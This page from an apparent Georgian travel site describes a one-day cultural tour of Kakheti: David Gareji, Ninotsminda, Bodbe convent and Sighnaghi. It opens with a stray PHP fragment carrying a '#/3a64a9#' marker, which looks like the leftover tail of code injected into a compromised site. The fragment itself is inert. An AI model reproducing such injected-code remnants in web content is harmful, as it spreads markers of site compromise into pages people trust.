if(empty($nt)) { $nt = " "; echo $nt; } #/3a64a9# ?>
Price - From-35$
Property -
Bedrooms -
Bath -
Garage -
Reduced

კულტურული ტური კახეთში

ერთდღიანი

   ტურის ფარგლებში საქართველოს ერთ-ერთ უმდიდრეს და ულამაზეს კუთხეში - კახეთში იმოგზაურებთ.  მოინახულებთ დავით გარეჯის სამონასტრო კომპლექსს, მათ შორის დავითის ლავრას. მონასტერი VI საუკუნეში, 562 წელს წმინდა დავით გარეჯელის მიერ დაარსდა. წმინდა მამა დავითი ცამეტ ასურელ მამათაგან ერთ-ერთი იყო, რომლებსაც, გადმოცემის თანახმად, ღვთისმშობელმა გამოცხადებით  აუწყა, რომ ქრისტეს სარწმუნოების საქადაგებლად საქართველოში წასულიყვნენ.  მამა დავითი  მთის ბუნებრივ გამოქვაბულში დასახლდა და აქ დააარსა პირველი მონასტერი, რომელსაც დღეს წმიდა დავითის ლავრა ეწოდება. ამავე საუკუნეში მისმა მოწაფეებმა და თანამოღვაწეებმა კიდევ ორი მონასტერი, კერძოდ მამა დოდომ – დოდოს რქა, მამა ლუკიანემ კი  – ნათლისმცემელი დააარსეს.

ამასთან, პროგრამის მიხედვით, ნინოწმინდის მონასტერს მოინახულებთ. კომპლექსის მთავარი ნაგებობას VI ს-ის III მეოთხედში აგებული წმ. ნინოს ტაძარი წარმოადგენს. გადმოცემის თანახმად, წმ. ნინომ სიცოცხლის ბოლო პერიოდი სწორედ აქ გაატარა, სანამ ავადმყოფს ბოდბეში გადაიყვანდნენ. დღეს აქ შემორჩენილია VI საუკუნის ტაძრის ნაშთები, რომელიც პირველი და ერთადერთი გუმბათოვანი ტაძარია საქართველოში.

ტურის ფარგლებში, აგრეთვე, VIII-IX საუკუნეებით დათარიღებულ  ბოდბის დედათა მონასტერსა და ქართველთა განმანათლებელი წმინდა ნინოს საფლავს მოინახულებთ.  ამასთან, სურვილისამებრ, შესაძლებლობა გექნებათ, განიბანოთ წმინდა წყაროში, რომელიც, გადმოცემის თანახმად, წმინდა ნინოს ლოცვის შედეგად გაჩნდა და არსებული მოსაზრებით, თუ ადამიანი მასში რწმენით განიბანება, მისი ყველა დაავადება გაქრება.

მოგზაურობა დასრულება სიყვარულის ქალაქად წოდებულ ულამაზეს ქალაქ სიღნაღში. თავად ქალაქის სახელწოდება სპარსული სიტყვისაგან მომდინარეობს  და თავშესაფარს ნიშნავს. ქალაქს გარს აკრავს გალავანი, რომელიც აგებულია მეფე ერეკლე II-ის მიერ. გალავნის სიგრძე 2,4 კილომეტრია, რომლის შემადგენლობაშიც 23 კოშკია. ასევე, დაათვალიერებთ სიღნაღის ისტორიულ მუზეუმს.

 

დღეს საუკეთესო ეროვნული კერძებით ტრადიციულ ქართულ რესტორანში დაასრულებთ. 

-

მომსახურებაში  შედის: ტრანსპორტირება;გიდის მომსახურება;მუზეუმში შესასვლელი ბილეთები;ვახშამი; ვახშამი;

Leave a Reply



Please verify your information

Your booking is complete

A detail copy has been sent to your email and also to our staff.